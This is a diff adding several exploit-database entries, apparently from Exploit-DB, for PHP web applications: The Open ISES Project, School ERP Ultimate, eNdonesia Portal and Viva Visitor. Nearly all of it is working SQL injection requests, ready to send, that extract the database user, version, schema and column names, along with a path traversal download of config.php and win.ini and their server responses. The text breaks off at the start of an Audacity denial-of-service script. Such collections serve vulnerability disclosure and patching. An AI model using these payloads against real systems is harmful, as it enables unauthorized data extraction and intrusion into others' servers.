b/exploits/php/webapps/45645.txt new file mode 100644 index 000000000..953aac55d --- /dev/null +++ b/exploits/php/webapps/45645.txt @@ -0,0 +1,184 @@ +# Exploit Title: The Open ISES Project 3.30A - 'tick_lat' SQL Injection +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://openises.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/openises/files/latest/download +# Version: 3.30A_050318 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/main.php + +POST /[PATH]/main.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 241 +frm_passwd=') anD (SELect 155 FroM(SELECT COunt(*),COncaT(conCAT(0x203a20,UseR(),DatABASE(),VErSIoN()),0x7e,(seleCT (elT(155=155,1))),0x496873616e2053656e63616e,floOR(RAnd(0)*2))x frOM INFormATION_SchEMA.PLugINS GroUP BY x)a) And ('Efe'='Efe +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 16:53:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/ +Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 720 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/nearby.php?tick_lat=[SQL]&tick_lng=[SQL] + +GET /[PATH]/nearby.php?tick_lat=1)%20anD%20EXTRactVALUE(112,conCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELect%20(ELT(112=112,1))),0x496873616e2053656e63616e))%20AND%20(66=66&tick_lng=1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 16:59:14 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 930 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/ajax/form_post.php?id=[SQL]&ticket_id=[SQL]&q=1&function=editaction + +GET /[PATH]/ajax/form_post.php?id=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe&ticket_id=1&q=1&function=editaction HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:10:13 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/ +Content-Length: 1321 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/sever_graph.php?p1=[SQL] + +GET /[PATH]/sever_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:26:55 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 931 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 5) +# http://localhost/[PATH]/inc_types_graph.php?p1=[SQL] + +GET /[PATH]/inc_types_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:28:55 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 996 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 6) +# http://localhost/[PATH]/city_graph.php?p1=[SQL] + +GET /[PATH]/city_graph.php?p1=1%27%20AnD%20EXTRactvaLUE(156,CONcat((selECT+GrouP_conCAT(scHEma_NAme+SEparaTOR+0x3c62723e)+frOM+INFOrmaTION_ScheMA.SCHEmatA),(SelecT%20(Elt(156=156,1))),0x496873616e2053656e63616e))--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:30:23 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 927 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 7) +# http://localhost/[PATH]/add_facnote.php?ticket_id=[SQL] + +GET /[PATH]/add_facnote.php?ticket_id=1+/*!00005ProcEDUre*/+/*!00005AnaLYSe*/+(extractvalue(0,/*!00005cONcat*/(0x27,0x3a,@@VErsion)),0)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:36:28 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7; path=/ +Content-Length: 1642 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45646.txt b/exploits/php/webapps/45646.txt new file mode 100644 index 000000000..e8737f327 --- /dev/null +++ b/exploits/php/webapps/45646.txt @@ -0,0 +1,34 @@ +# Exploit Title: School ERP Ultimate 2018 - 'fid' SQL Injection +# Dork: N/A +# Date: 2018-10-21 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://freeschoolerp.com/ +# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip +# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download +# Version: 2018 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/student_staff/?pid=54&action=staff_timetable&fid=[SQL] + +GET /[PATH]/student_staff/?pid=54&action=staff_timetable&fid=-%31%20%75%6e%49%6f%4e%20%73%45%6c%45%63%74%20%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=nno01rkuj0ql0k1sb96uhg1va1 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 00:11:18 GMT +Server: Apache +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 68790 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45654.txt b/exploits/php/webapps/45654.txt new file mode 100644 index 000000000..9ba8d642a --- /dev/null +++ b/exploits/php/webapps/45654.txt @@ -0,0 +1,154 @@ +# Exploit Title: eNdonesia Portal 8.7 - 'artid' SQL Injection +# Dork: N/A +# Date: 2018-10-21 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.endonesia.org/ +# Software Link: https://sourceforge.net/projects/endonesia/files/latest/download +# Version: 8.7 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/mod.php?mod=publisher&op=viewarticle&artid=[SQL] + +GET /[PATH]/mod.php?mod=publisher&op=viewarticle&artid=12%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:04:32 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/mod.php?mod=publisher&op=viewcat&cid=[SQL] + +GET /[PATH]/mod.php?mod=publisher&op=viewcat&cid=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:08:12 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 7597 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/mod.php?mod=diskusi&op=viewdisk&did=[SQL] + +GET /[PATH]/mod.php?mod=diskusi&op=viewdisk&did=4%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:12:43 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5777 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 4) +# http://localhost/[PATH]/mod.php?mod=galeri&op=view_album&cid=[SQL] + +GET /[PATH]/mod.php?mod=galeri&op=view_album&cid=5%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:16:24 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4671 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 5) +# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL] + +GET /[PATH]/mod.php?mod=content&op=viewcontent&contid=11%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:19:14 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 4644 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 6) +# http://localhost/[PATH]/mod.php?mod=content&op=viewcontent&contid=[SQL] + +GET /[PATH]/mod.php?mod=about&op=viewabout&aboutid=1%27||(SELEct%20%27Efe%27%20FRom%20DUal%20WHERE%20113=113%20anD%20(SeleCT%20156%20FRom(SElecT%20CouNT(*),coNcaT(CONCat(0x203a20,USeR(),DatABAse(),verSIoN()),(SEleCT%20(Elt(156=156,1))),FLooR(RAnd(0)*2))x%20frOM%20InFORmaTION_SCHemA.PLugiNS%20GRouP%20BY%20x)a))||%27 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=6u88omoqt8ieul6oug7laekag5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 21 Oct 2018 01:23:41 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 7072 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45655.txt b/exploits/php/webapps/45655.txt new file mode 100644 index 000000000..73e45ad41 --- /dev/null +++ b/exploits/php/webapps/45655.txt @@ -0,0 +1,56 @@ +# Exploit Title: The Open ISES Project 3.30A - Arbitrary File Download +# Dork: N/A +# Date: 2018-10-18 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://openises.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/openises/files/latest/download +# Version: 3.30A_050318 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/ajax/download.php?filename=[FILE]&origname=&type= + +GET /[PATH]/ajax/download.php?filename=../config.php&origname=&type= HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:20:09 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Disposition: attachment; filename=""; +Content-Transfer-Encoding: binary +Pragma: public +Cache-Control: must-revalidate, post-check=0, pre-check=0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: {$filetype} + +GET /[PATH]/ajax/download.php?filename=../../../../../Windows/win.ini&origname=&type= HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=pfdl1njr8uei6v7n3euoejuta7 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 18 Oct 2018 17:23:53 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Disposition: attachment; filename=""; +Content-Transfer-Encoding: binary +Pragma: public +Cache-Control: must-revalidate, post-check=0, pre-check=0 +Content-Length: 564 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: {$filetype} \ No newline at end of file diff --git a/exploits/php/webapps/45656.txt b/exploits/php/webapps/45656.txt new file mode 100644 index 000000000..9fb372b5e --- /dev/null +++ b/exploits/php/webapps/45656.txt @@ -0,0 +1,90 @@ +# Exploit Title: Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection +# Dork: N/A +# Date: 2018-10-19 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://viva-visitor.sourceforge.io/ +# Software Link: https://sourceforge.net/projects/viva-visitor/files/latest/download +# Version: 0.95.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/repeat_verify-n.php +# Post / fname=[SQL] + +POST /[PATH]/repeat_verify-n.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 516 +fname=%22%22%27%27%27%20UniON%20SelECt%20nuLL%2cnuLL%2cCoNCat((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL%2cnuLL--%20Efe +HTTP/1.1 200 OK +Date: Fri, 19 Oct 2018 20:58:30 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 3175 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/repeat_verify-n.php +# Post / lname=[SQL] + +POST /[PATH]/repeat_verify-n.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 197 +lname=%'%20anD%20(SELecT%20112%20FRom(SelECT%20COunT(*),COncAT(version(),(SElecT%20(Elt(112=112,1))),dataBAse(),FLooR(RAnD(0)*2))x%20FroM%20INforMATIon_SCheMA.PluGINS%20GRouP%20By%20x)a)%20AnD'%'=' +HTTP/1.1 200 OK +Date: Fri, 19 Oct 2018 21:03:13 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 817 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/repeat_verify.php?me=[SQL] + +GET /[PATH]/repeat_verify.php?me=1%20UNION%20SeLECt%20NuLl%2cNuLl%2cCOnCaT((selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x))%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl%2cNuLl--%20Efe HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=3dc6r9l1ufi6bt2ngfedu84i92 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Fri, 19 Oct 2018 21:13:06 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 2714 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/dos/45644.pl b/exploits/windows/dos/45644.pl new file mode 100755 index 000000000..5bad10792 --- /dev/null +++ b/exploits/windows/dos/45644.pl @@ -0,0 +1,98 @@ +# Exploit Title: AudaCity 2.3 - Denial of Service (PoC) +# Author: Kağan Çapar +# Discovery Date: 2018-10-19 +# Software Link: https://www.fosshub.com/Audacity.html +# Vendor Homepage : https://www.audacityteam.org +# Tested Version: 2.3 +# Tested on OS: Windows 10 x64/86 (Normal use CPU) & Windows 7 (High CPU usage) & Windows XP (High CPU usage) +# other version should be affected + +# Steps to Reproduce: Run the perl exploit script, it will create a new +# file with 